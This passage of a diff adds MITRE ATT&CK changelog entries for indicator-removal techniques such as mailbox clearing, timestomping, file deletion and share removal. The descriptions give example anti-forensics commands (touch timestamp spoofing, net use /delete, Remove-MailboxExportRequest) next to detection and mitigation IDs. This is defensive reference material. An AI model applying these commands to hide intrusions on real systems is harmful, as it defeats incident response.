+                            "description": "Broadcom. (2025, February 20). Auditing ESXi Shell logins and commands. Retrieved March 26, 2025.",
+                            "url": "https://knowledge.broadcom.com/external/article/321910/auditing-esxi-shell-logins-and-commands.html"
+                        },
+                        {
+                            "source_name": "Sophos PowerShell command audit",
+                            "description": "jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.",
+                            "url": "https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit"
+                        },
+                        {
+                            "source_name": "Microsoft PowerShell Command History",
+                            "description": "Microsoft. (2020, May 13). About History. Retrieved September 4, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7"
+                        },
+                        {
+                            "source_name": "US-CERT-TA18-106A",
+                            "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"
+                        },
+                        {
+                            "source_name": "Sophos PowerShell Command History Forensics",
+                            "description": "Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved November 17, 2024.",
+                            "url": "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Vikas Singh, Sophos",
+                        "Emile Kenning, Sophos",
+                        "Austin Clark, @c2defense"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.627000+00:00\", \"old_value\": \"2026-04-15 20:27:09.604000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1029: Remote Data Storage",
+                            "M1039: Environment Variable Permissions"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0165: Behavioral Detection of Command History Clearing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-07-08 21:04:03.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.629000+00:00",
+                    "name": "Clear Mailbox Data",
+                    "description": "Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. \n\nAdversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the <code>ExchangePowerShell</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including <code>Remove-MailboxExportRequest</code> to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called <code>mail</code>  or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)\n\nAdversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1070/008",
+                            "external_id": "T1070.008"
+                        },
+                        {
+                            "source_name": "Volexity SolarWinds",
+                            "description": "Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.",
+                            "url": "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/"
+                        },
+                        {
+                            "source_name": "Cybereason Cobalt Kitty 2017",
+                            "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+                            "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf"
+                        },
+                        {
+                            "source_name": "mailx man page",
+                            "description": "Michael Kerrisk. (2021, August 27). mailx(1p) \u2014 Linux manual page. Retrieved June 10, 2022.",
+                            "url": "https://man7.org/linux/man-pages/man1/mailx.1p.html"
+                        },
+                        {
+                            "source_name": "ExchangePowerShell Module",
+                            "description": "Microsoft. (2017, September 25). ExchangePowerShell. Retrieved June 10, 2022.",
+                            "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes"
+                        },
+                        {
+                            "source_name": "Microsoft OAuth Spam 2022",
+                            "description": "Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Liran Ravich, CardinalOps"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.629000+00:00\", \"old_value\": \"2026-04-15 20:27:22.074000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1029: Remote Data Storage",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0266: Behavioral Detection of Mailbox Data and Log Deletion for Anti-Forensics"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-06-15 18:00:04.219000+00:00",
+                    "modified": "2026-05-12 15:12:00.627000+00:00",
+                    "name": "Clear Network Connection History and Configurations",
+                    "description": "Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.\n\nNetwork connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers</code>\n\nWindows may also store information about recent RDP connections in files such as <code>C:\\Users\\\\%username%\\Documents\\Default.rdp</code> and `C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Terminal\nServer Client\\Cache\\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nMalicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1686) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1070/007",
+                            "external_id": "T1070.007"
+                        },
+                        {
+                            "source_name": "FreeDesktop Journal",
+                            "description": "freedesktop.org. (n.d.). systemd-journald.service. Retrieved June 15, 2022.",
+                            "url": "https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html"
+                        },
+                        {
+                            "source_name": "Microsoft RDP Removal",
+                            "description": "Microsoft. (2021, September 24). How to remove entries from the Remote Desktop Connection Computer box. Retrieved June 15, 2022.",
+                            "url": "https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer"
+                        },
+                        {
+                            "source_name": "Moran RDPieces",
+                            "description": "Moran, B. (2020, November 18). Putting Together the RDPieces. Retrieved October 17, 2022.",
+                            "url": "https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf"
+                        },
+                        {
+                            "source_name": "Apple Culprit Access",
+                            "description": "rjben. (2012, May 30). How do you find the culprit when unauthorized access to a computer is a problem?. Retrieved August 3, 2022.",
+                            "url": "https://discussions.apple.com/thread/3991574"
+                        },
+                        {
+                            "source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing",
+                            "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] \u2013 Working From Home? Remote Logins. Retrieved August 19, 2021.",
+                            "url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "CrowdStrike Falcon OverWatch"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows",
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.627000+00:00\", \"old_value\": \"2026-04-16 19:27:07.242000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1024: Restrict Registry Permissions",
+                            "M1029: Remote Data Storage"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0049: Behavioral Detection of Network History and Configuration Tampering"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-07-29 19:32:11.552000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Clear Persistence",
+                    "description": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)\n\nIn some instances, artifacts of persistence may also be removed once an adversary\u2019s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1070/009",
+                            "external_id": "T1070.009"
+                        },
+                        {
+                            "source_name": "Cylance Dust Storm",
+                            "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.",
+                            "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf"
+                        },
+                        {
+                            "source_name": "Talos - Cisco Attack 2022",
+                            "description": "Nick Biasini. (2022, August 10). Cisco Talos shares insights related to recent cyber attack on Cisco. Retrieved March 9, 2023.",
+                            "url": "https://blog.talosintelligence.com/recent-cyber-attack/"
+                        },
+                        {
+                            "source_name": "NCC Group Team9 June 2020",
+                            "description": "Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.",
+                            "url": "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Gavin Knapp"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2026-04-15 20:28:24.292000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1029: Remote Data Storage"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0040: Detection of Persistence Artifact Removal Across Host Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-31 12:35:36.479000+00:00",
+                    "modified": "2026-05-12 15:12:00.718000+00:00",
+                    "name": "File Deletion",
+                    "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows, <code>rm</code> or <code>unlink</code> on Linux and macOS, and `rm` on ESXi.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1070/004",
+                            "external_id": "T1070.004"
+                        },
+                        {
+                            "source_name": "Microsoft SDelete July 2016",
+                            "description": "Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.",
+                            "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Walker Johnson"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.718000+00:00\", \"old_value\": \"2026-04-15 20:28:46.342000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0140: Behavioral Detection of Malicious File Deletion"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-31 12:39:18.816000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Network Share Connection Removal",
+                    "description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\\\system\\share /delete</code> command. (Citation: Technet Net Use)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1070/005",
+                            "external_id": "T1070.005"
+                        },
+                        {
+                            "source_name": "Technet Net Use",
+                            "description": "Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.",
+                            "url": "https://technet.microsoft.com/bb490717.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2026-04-15 20:29:50.512000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0103: Behavioral Detection of Network Share Connection Removal via CLI and SMB Disconnects"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-05-31 11:07:57.406000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Relocate Malware",
+                    "description": "Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.\n\nRelocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)\n\nRelocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders. Moving payloads into target directories does not alter the Creation timestamp, thereby evading detection logic reliant on modifications to this artifact (i.e., [Timestomp](https://attack.mitre.org/techniques/T1070/006)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1070/010",
+                            "external_id": "T1070.010"
+                        },
+                        {
+                            "source_name": "Latrodectus APR 2024",
+                            "description": "Proofpoint Threat Research and Team Cymru S2 Threat Research. (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May 31, 2024.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice"
+                        },
+                        {
+                            "source_name": "DFIR Report Trickbot June 2023",
+                            "description": "The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out. Retrieved May 31, 2024.",
+                            "url": "https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Gregory Frey",
+                        "Matt Anderson, @\u200cnosecurething, Huntress"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2026-04-15 20:29:55.911000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0439: Detection of Malware Relocation via Suspicious File Movement"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-31 12:42:44.103000+00:00",
+                    "modified": "2026-05-12 15:12:00.630000+00:00",
+                    "name": "Timestomp",
+                    "description": "Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.\n\nIn Windows systems, both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)\n\nModifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)\n\nAdversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in \u201cdouble timestomping\u201d by modifying times on both attributes simultaneously.(Citation: Double Timestomping)\n\nIn Linux systems and on ESXi servers, threat actors may attempt to perform timestomping using commands such as `touch -a -m -t <timestamp> <filename>` (which sets access and modification times to a specific value) or `touch -r <filename> <filename>` (which sets access and modification times to match those of another file).(Citation: Inversecos Linux Timestomping)(Citation: Juniper Networks ESXi Backdoor 2022)\n\nTimestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1070/006",
+                            "external_id": "T1070.006"
+                        },
+                        {
+                            "source_name": "Juniper Networks ESXi Backdoor 2022",
+                            "description": "Asher Langton. (2022, December 9). A Custom Python Backdoor for VMWare ESXi Servers. Retrieved March 26, 2025.",
+                            "url": "https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers"
+                        },
+                        {
+                            "source_name": "WindowsIR Anti-Forensic Techniques",
+                            "description": "Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.",
+                            "url": "http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html"
+                        },
+                        {
+                            "source_name": "Inversecos Linux Timestomping",
+                            "description": "inversecos. (2022, August 4). Detecting Linux Anti-Forensics: Timestomping. Retrieved March 26, 2025.",
+                            "url": "https://www.inversecos.com/2022/08/detecting-linux-anti-forensics.html"
+                        },
+                        {
+                            "source_name": "Inversecos Timestomping 2022",
+                            "description": "Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping Detection \u2013 NTFS Forensics. Retrieved September 30, 2024.",
+                            "url": "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html"
+                        },
+                        {
+                            "source_name": "Magnet Forensics",
+                            "description": "Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.",
+                            "url": "https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/"
+                        },
+                        {
+                            "source_name": "Double Timestomping",
+                            "description": "Matthew Dunwoody. (2022, April 28). I have seen double-timestomping ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.",
+                            "url": "https://x.com/matthewdunwoody/status/1519846657646604289"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Mike Hartley @mikehartley10",
+                        "Romain Dumont, ESET"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.630000+00:00\", \"old_value\": \"2026-04-15 20:30:57.770000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
